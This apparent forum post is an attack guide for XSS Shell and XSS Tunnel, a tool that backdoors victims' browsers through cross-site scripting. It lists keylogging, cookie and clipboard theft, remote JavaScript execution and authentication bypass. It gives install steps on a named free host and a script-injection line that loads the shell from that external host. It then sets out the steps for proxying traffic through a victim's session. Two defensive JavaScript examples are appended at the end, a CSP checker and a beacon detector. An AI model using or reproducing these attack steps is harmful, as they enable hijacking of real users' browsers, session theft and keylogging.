Guest Kabron

XSS Tunnel


XSS Shell is a powerful XSS backdoor and XSS zombie manager. This concept was first presented by XSS-Proxy (http://xss-proxy.sourceforge.net/). Normally during XSS attacks an attacker has one shot; however, an XSS Shell can be used interactively to send requests and receive responses from a victim. It is also possible to backdoor the page and keep the connection open between the attacker and the victim.

It is a good way of bypassing the following protections:

- Bypassing IP Restrictions

- NTLM / Basic Auth or any similar authentication

- Session based custom protections

Key Features:

- Regenerating Pages: this is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even when a user clicks on any of the links in the infected page, they will still be under control (within cross-domain restrictions). In normal XSS attacks, when the user leaves the page nothing can be done. Secondly, this feature keeps the session open, so even if the victim follows an outside link from the infected page, the session is not going to time out and the attacker will still be in charge.

- Keylogger

- Mouse Logger (click points + current DOM)

Built-in Commands:

- Get Keylogger Data

- Get Current Page (Current rendered DOM / such as a screenshot)

- Get Cookie

- Execute supplied javaScript (eval)

- Get Clipboard (IE only)

- Get internal IP address (Firefox + JVM only)

- Check victim’s visited URL history

- Force to Crash victim’s browser

Install

1. Download XSS Tunnel from http://ferruh.mavituna.com/xss-tunnelling-paper-and-xss-tunnel-tool-oku/. XSS Shell was written in ASP. As the backend, it uses MS Access for portability and easy installation. It requires IIS 5 or above to work.

7host is a free web host that supports ASP, MS Access, and IIS. For this video my url is http://free.7host05.com/Patchy/

2. Modify xssshell.asp SERVER variable to http://free.7host05.com/Patchy/

3. Modify admin/db.asp DBPATH to "E:user1Patchydbshell.mdb" to configure the database. Also, the default password (w00t) can be changed in this file. To figure out the path to the database, use this script:

<%
Response.Write Server.MapPath(".")
%>

4. Upload content of Xssshell folder.

Attack

XSS Shell works by setting up an XSS Channel, which is basically an AJAX application that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s JavaScript reference by way of an XSS attack. The attacker is then able to control the victim’s browser. After this point the attacker can see requests and responses and is able to instruct the victim’s browser to carry out requests.

The Xss Shell has three main parts. First, the server side part of the XSS Shell coordinates the XSS Shell between an attacker and the victim. The second part of the tool is client-side and written in JavaScript. This loads in the victim’s browser and is responsible for the receiving and processing of commands together with providing the channel between the victim and the attacker. The final part of the XSS Shell is the administration interface. An attacker can send new commands and receive the responses from a victim(s) browser instantly from this interface.

1. An attacker infects a website with a persistent or reflected (temporary) XSS attack which calls remote XSS Shell JavaScript. Ex. <script src="http://free.7host05.com/Patchy/xssshell.asp"></script>

2. The Victim follows a link or visits the page and executes the JavaScript within that domain.

3. The Victim’s browser begins to perform periodic requests to the XSS Shell Server and looks for new commands.

4. When the victim browser receives a new command (such as Get Cookies, Execute custom JavaScript, Get Key logger Data etc.) it is processed and returns the results to the XSS Shell.

5. The Attacker can push new commands to victim(s) browser and view the results from the XSS Shell administration interface.

Xss Tunnel

XSS Tunneling is the tunneling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. The XSS Tunnel is a standard HTTP proxy which sits on the attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel transparently converts the requests and responses into valid HTTP responses and XSS Shell requests.

How Does XSS Tunnel Work?

1. The XSS Tunnel connects to a specified XSS Shell and obtains the current active identifier (the victim to be controlled)

2. The local HTTP client (browser, Nikto etc.) sends HTTP requests to the XSS Tunnel. The XSS Tunnel converts the HTTP requests into requests which the XSS Shell can understand and process. It then sends these requests to the XSS Shell Server.

3. The XSS Shell Client (which resides in JavaScript in the victim’s browser) performs periodic requests for the XSS Shell Server and checks for new commands to process.

4. The XSS Tunnel checks the XSS Shell Server for responses to previously assigned requests. If there is a response, it converts it to a valid HTTP response and sends it to the client application. By default the XSS Tunnel caches JavaScript, CSS and image files for better performance. This is really required if using the XSS Tunnel with a browser. If the requested resource is already in the cache, the XSS Tunnel obtains it from the local cache and sends it to the client application. Caching can be disabled or the cache can be managed from the user interface of XSS Tunnel.

Attack Process

1. Setup the XSS Shell Server,

2. Configure the XSS Tunnel to use the XSS Shell Server,

3. Prepare the XSS attack (submit to a vulnerable website or send a link etc.),

4. Launch the XSS Tunnel and wait for a victim,

5. Configure the tool or browser to use the XSS Tunnel,

6. When you see victim in the XSS Tunnel, start to use your browser / tool for the targeted domain.

Video tutorials (HD):

http://www.youtube.com/watch?v=Vg7lhWuPjMY
http://www.youtube.com/watch?v=Cevlym76CWI&feature=related
http://www.youtube.com/watch?v=OkiMTqYD1_Q&feature=related
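
The channel described above depends on the browser being allowed to load a script from a foreign host. The check below is an added example, not part of the original post or of XSS Shell: a simplified Content-Security-Policy matcher that reports whether a page's policy would let such an external script reference load. It assumes placeholder hostnames and ignores nonces, hashes, paths, ports and `script-src-elem`.

```javascript
// Simplified CSP check (assumption: no nonce/hash/path/port handling).
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // CSP keeps the first occurrence of a directive and ignores repeats.
    if (name && !(name.toLowerCase() in policy)) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === pageOrigin;
  if (s === "*") return url.protocol === "http:" || url.protocol === "https:";
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme-source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/);
  if (!m) return false; // keywords such as 'unsafe-inline' never match a URL
  const [, scheme, wildcard, host] = m;
  if (scheme && url.protocol !== scheme + ":") return false;
  return wildcard ? url.hostname.endsWith("." + host) : url.hostname === host;
}

// True when the browser would fetch and run scriptUrl on a page served with cspHeader.
function scriptAllowed(cspHeader, pageOrigin, scriptUrl) {
  if (!cspHeader) return true; // no policy: any script host is accepted
  const policy = parseCsp(cspHeader);
  const sources = policy["script-src"] ?? policy["default-src"];
  if (!sources) return true; // the policy does not govern scripts
  const url = new URL(scriptUrl);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Constructed inputs: placeholder page origin and placeholder remote script host.
const PAGE = "https://app.example";
const REMOTE = "http://shell-host.example/xssshell.asp";
console.log(scriptAllowed("", PAGE, REMOTE));                   // no CSP
console.log(scriptAllowed("default-src 'self'", PAGE, REMOTE)); // restrictive CSP
```
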
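
The periodic requests the client makes to the shell server (step 3 in both lists above) leave a regular pattern in proxy logs. This added detection example, which is not part of the original post, flags a client that polls a host other than the page's own at near-constant intervals; the log format, hostnames, `/poll` path and thresholds are all constructed assumptions.

```javascript
// Constructed sample (not real traffic): "<epoch s> <client> <page origin> <requested URL>"
const mk = (client, page, url, times) => times.map((t) => `${t} ${client} ${page} ${url}`);
const SAMPLE_LOG = [
  ...mk("10.0.0.5", "https://app.example", "https://app.example/inbox", [1000, 1030]),
  ...mk("10.0.0.5", "https://app.example", "http://shell-host.example/poll", [1000, 1005, 1010, 1016, 1020, 1025]),
  ...mk("10.0.0.5", "https://app.example", "https://cdn.example/a.png", [1000, 1002, 1050, 1300, 1301]),
  ...mk("10.0.0.9", "https://app.example", "https://stats.example/hit", [1100, 1400]),
].join("\n");

function parseLine(line) {
  const [ts, client, pageOrigin, url] = line.trim().split(/\s+/);
  return { ts: Number(ts), client, pageHost: new URL(pageOrigin).host, destHost: new URL(url).host };
}

// Flags (client, page, foreign host) groups with >= minHits requests whose gaps
// have a coefficient of variation (stddev / mean) of at most maxJitter.
function findBeacons(logText, { minHits = 5, maxJitter = 0.2 } = {}) {
  const groups = new Map();
  for (const line of logText.split("\n")) {
    if (!line.trim()) continue;
    const e = parseLine(line);
    if (e.destHost === e.pageHost) continue; // same-origin requests are not the channel
    const key = `${e.client}|${e.pageHost}|${e.destHost}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e.ts);
  }
  const findings = [];
  for (const [key, times] of groups) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const mean = gaps.reduce((s, g) => s + g, 0) / gaps.length;
    const sd = Math.sqrt(gaps.reduce((s, g) => s + (g - mean) ** 2, 0) / gaps.length);
    const jitter = mean > 0 ? sd / mean : Infinity;
    if (jitter > maxJitter) continue; // irregular timing, e.g. ordinary asset loads
    const [client, pageHost, destHost] = key.split("|");
    findings.push({ client, pageHost, destHost, hits: times.length, meanGap: mean, jitter });
  }
  return findings;
}

console.log(findBeacons(SAMPLE_LOG));
```
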
